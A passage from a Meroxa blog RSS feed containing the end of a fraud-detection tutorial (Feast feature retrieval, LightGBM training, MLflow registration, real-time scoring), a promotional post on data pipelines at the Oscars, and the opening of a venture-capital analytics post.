    &lt;span class=&quot;token string&quot;&gt;&quot;event_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;     &lt;span class=&quot;token comment&quot;&gt;# timestamps for each transaction&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

training_df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; fs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_historical_features&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    entity_df&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;entity_df&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    feature_refs&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:amount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                  &lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:watchlist_flag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                  &lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:transaction_count_last_10m&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;to_df&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# training_df now includes the needed columns + your label&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;3.2 Train a Model (e.g., LightGBM)&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; lightgbm &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; lgb
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; sklearn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;model_selection &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; train_test_split
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; sklearn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; roc_auc_score

pdf &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; training_df&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;dropna&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# remove partial data&lt;/span&gt;
X &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pdf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;drop&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;columns&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;event_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
y &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pdf&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

X_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; X_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_test &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; train_test_split&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; stratify&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; random_state&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;42&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

dtrain &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Dataset&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; label&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y_train&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
dtest &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Dataset&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; label&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; reference&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;dtrain&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

params &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;objective&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;binary&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;metric&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;auc&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;is_unbalance&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;True&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

model &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;train&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;params&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtrain&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; num_boost_round&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; valid_sets&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;dtest&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; early_stopping_rounds&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
y_pred &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; model&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;predict&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_test&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
auc &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; roc_auc_score&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;y_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_pred&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Test AUC: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;auc&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token format-spec&quot;&gt;.4f&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;3.3 Register in MLflow&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; mlflow
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightgbm

mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;set_experiment&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;/Users/your.name@company.com/fraud_experiment&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;with&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;start_run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightgbm&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;log_model&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;model&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; artifact_path&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;model&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; registered_model_name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;FraudDetectionModel&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;log_metric&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;auc&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; auc&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    run_id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;active_run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run_id
    &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Model logged in run: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;run_id&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;Step 4: Real-Time Fraud Scoring&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Databricks Model Serving&lt;/strong&gt; (or a custom microservice) hosts the trained model.&lt;/li&gt;
&lt;li&gt;When a &lt;strong&gt;new transaction&lt;/strong&gt; arrives, Conduit has already fed the relevant data to Feast’s &lt;strong&gt;online store&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The serving endpoint:
&lt;ul&gt;
&lt;li&gt;Looks up the latest features for &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt; from the Feast online store (Redis).&lt;/li&gt;
&lt;li&gt;Passes those features to the LightGBM model.&lt;/li&gt;
&lt;li&gt;Returns a fraud probability in real time.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;If the &lt;strong&gt;fraud probability&lt;/strong&gt; is above a threshold, an &lt;strong&gt;alert&lt;/strong&gt; or &lt;strong&gt;blocking action&lt;/strong&gt; is triggered.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Conduit&lt;/strong&gt; seamlessly integrates with &lt;strong&gt;Feast&lt;/strong&gt; and &lt;strong&gt;Databricks&lt;/strong&gt; to enable &lt;strong&gt;real-time fraud detection&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt; handles high-throughput, low-latency &lt;strong&gt;data ingestion&lt;/strong&gt; and &lt;strong&gt;transformations&lt;/strong&gt; using built-in processors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feast&lt;/strong&gt; manages consistent &lt;strong&gt;offline and online feature stores&lt;/strong&gt; (S3 + Redis).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt; powers the &lt;strong&gt;ML pipeline&lt;/strong&gt; (training, model registry, real-time serving).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With this setup, banks and financial institutions can quickly detect and respond to fraudulent transactions, leveraging a robust, scalable data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to learn more?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dive into the &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;Conduit documentation&lt;/a&gt; for more detailed pipeline configs and processor usage.&lt;/li&gt;
&lt;li&gt;Explore the Feast docs for advanced feature store topics.&lt;/li&gt;
&lt;li&gt;Check out Databricks MLflow docs for model tracking and deployment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Stay tuned for more guides on building next-generation data pipelines and ML workflows with Conduit and Feast—accelerating your fraud detection, analytics, and beyond. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Happy streaming and safe banking!&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[AI & Data at the Oscars: How Meroxa Can Power Hollywood's Biggest Night]]></title><description><![CDATA[Discover how AI and real-time data power the Oscars, from predicting winners and analyzing audience sentiment to securing online voting and enhancing live event experiences. This blog explores how Meroxa’s Conduit Platform enables seamless real-time data movement, helping data science and AI teams drive insights, security, and engagement at Hollywood’s biggest night. 🚀🎬 **Read more to see how data is shaping the future of entertainment!]]></description><link>https://meroxa.com/blog/ai-and-data-at-the-oscars-how-meroxa-can-power-hollywoods-biggest-night</link><guid isPermaLink="false">https://meroxa.com/blog/ai-and-data-at-the-oscars-how-meroxa-can-power-hollywoods-biggest-night</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 03 Mar 2025 11:13:00 GMT</pubDate><content:encoded>&lt;p&gt;The &lt;strong&gt;Academy Awards (Oscars)&lt;/strong&gt; are more than just a celebration of cinema; they are a &lt;strong&gt;data-driven&lt;/strong&gt; event where &lt;strong&gt;AI, machine learning, and real-time analytics&lt;/strong&gt; play a crucial role in predicting winners, analyzing audience sentiment, and ensuring secure voting.&lt;/p&gt;
&lt;p&gt;For &lt;strong&gt;data science and AI leaders&lt;/strong&gt;, ensuring smooth, real-time data flows across diverse systems is critical. This is where &lt;strong&gt;Meroxa’s Conduit Platform&lt;/strong&gt; comes in. By enabling &lt;strong&gt;real-time data movement&lt;/strong&gt; across &lt;strong&gt;databases, APIs, and analytics platforms&lt;/strong&gt;, Meroxa helps power the AI-driven insights behind Hollywood’s biggest night.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Predicting Oscar Winners with Real-Time Data Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Studios, media analysts, and prediction platforms leverage &lt;strong&gt;machine learning models&lt;/strong&gt; to predict winners based on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Historical win patterns&lt;/strong&gt; (e.g., previous Best Picture trends)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Social media sentiment&lt;/strong&gt; (Twitter, Reddit, TikTok engagement)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Box office revenue &amp;#x26; streaming metrics&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Award season trajectory&lt;/strong&gt; (Golden Globes, BAFTAs, Critics’ Choice, etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-time ingestion&lt;/strong&gt; of &lt;strong&gt;box office data, streaming metrics, and social media sentiment&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ETL &amp;#x26; transformation&lt;/strong&gt; to prepare data for machine learning models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless movement&lt;/strong&gt; of insights to analytics platforms like &lt;strong&gt;BigQuery, Snowflake, or Clickhouse&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of predictive analytics in action:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/oscar-predictions.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;AI-Driven Audience Sentiment Analysis&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;During the Oscars, real-time audience sentiment analysis is key to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Understanding &lt;strong&gt;public reactions&lt;/strong&gt; to winners and speeches.&lt;/li&gt;
&lt;li&gt;Tracking &lt;strong&gt;fan-favorite picks vs. Academy choices&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Optimizing social media engagement and live event interactions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests live tweets, comments, and reactions from APIs.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streams data into NLP models&lt;/strong&gt; for sentiment analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delivers results in real time&lt;/strong&gt; to dashboards for media analysts.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of sentiment analysis with Meroxa:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com//img/audience-sentiment.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Secure and Transparent Voting with AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Oscars voting process&lt;/strong&gt; must be &lt;strong&gt;secure, transparent, and tamper-proof&lt;/strong&gt;. AI and data pipelines play a crucial role in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Detecting anomalies&lt;/strong&gt; in voting patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ensuring secure voting transmission&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Providing audit logs&lt;/strong&gt; for transparency.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Streaming ingestion&lt;/strong&gt; of vote data into audit systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-time monitoring&lt;/strong&gt; for anomalies or suspicious voting patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secure logging&lt;/strong&gt; for regulatory compliance and verification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of AI support of secure and transparent voting:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/secure-voting.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;AI-Enhanced Oscars Marketing and Content Recommendations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Streaming platforms and media companies use AI to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Recommend Oscar-nominated films to users.&lt;/li&gt;
&lt;li&gt;Personalize content based on viewing behavior.&lt;/li&gt;
&lt;li&gt;Target ads for Oscar-related promotions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connects customer engagement data (view history, clicks, preferences).&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streams data into recommendation models.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delivers real-time personalization to streaming platforms.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow content/marketing recommendations:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/marketing-recommendations.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Live Event Enhancements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;AI-driven &lt;strong&gt;real-time analytics&lt;/strong&gt; track &lt;strong&gt;viewer engagement, social media mentions, and voting polls&lt;/strong&gt; during the Oscars ceremony.&lt;/li&gt;
&lt;li&gt;AI &lt;strong&gt;autogenerates captions and translations&lt;/strong&gt; to enhance accessibility for global audiences.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests real-time viewer data from various streaming and social media platforms.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feeds live engagement data to AI models for insights.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streams caption and translation data in real time.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Live event enhancement example:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/live-enhancements.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Deepfake Detection for Authenticity&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The Academy, in collaboration with AI companies, can use deepfake detection tools to verify the authenticity of media clips related to nominated films, preventing misinformation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests and streams video content for real-time verification.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connects deepfake detection AI models to media archives.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sends alerts for suspicious or manipulated content.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example of Deepfake detection with Meroxa:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/deepseek-detection.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Oscars are a data-driven event&lt;/strong&gt;, and AI-powered analytics require &lt;strong&gt;real-time, reliable, and scalable&lt;/strong&gt; data pipelines. &lt;strong&gt;Meroxa’s Conduit Platform&lt;/strong&gt; helps data science and AI teams &lt;strong&gt;ingest, transform, and move&lt;/strong&gt; data efficiently across diverse systems—whether for predictive analytics, audience insights, voting security, or AI-powered marketing.&lt;/p&gt;
&lt;p&gt;With &lt;strong&gt;Meroxa&lt;/strong&gt;, data leaders can ensure that their pipelines &lt;strong&gt;perform seamlessly&lt;/strong&gt;, enabling better decision-making, improved security, and &lt;strong&gt;more engaging experiences for audiences worldwide&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Why AI and Data Will Shape the Future of Hollywood&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Looking ahead, AI could enable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI-assisted filmmaking recognition&lt;/strong&gt; where AI-generated films compete in their own category.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deeper bias analysis&lt;/strong&gt; to identify and address gender, racial, or genre biases in nominations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved real-time audience engagement&lt;/strong&gt; with hyper-personalized content delivery.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;🚀 &lt;strong&gt;Ready to revolutionize your data pipelines? Discover how Meroxa makes real-time data movement seamless.&lt;/strong&gt; &lt;a href=&quot;https://www.meroxa.com/&quot;&gt;Try Meroxa Today&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;🔗 &lt;strong&gt;Follow us on&lt;/strong&gt; &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; **for the latest updates on AI, data streaming, and real-time analytics.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Predictive Analytics in Venture Capital: A Technical Deep Dive for Tech Leaders]]></title><description><![CDATA[Explore how predictive analytics is transforming venture capital by leveraging machine learning, AI-driven data models, and real-time insights to optimize investment decisions. This technical deep dive covers data pipelines, risk assessment models, and portfolio optimization strategies, equipping tech leaders with the tools to enhance deal flow, mitigate risks, and maximize returns in the evolving VC landscape]]></description><link>https://meroxa.com/blog/predictive-analytics-in-venture-capital-a-technical-deep-dive-for-tech-leaders</link><guid 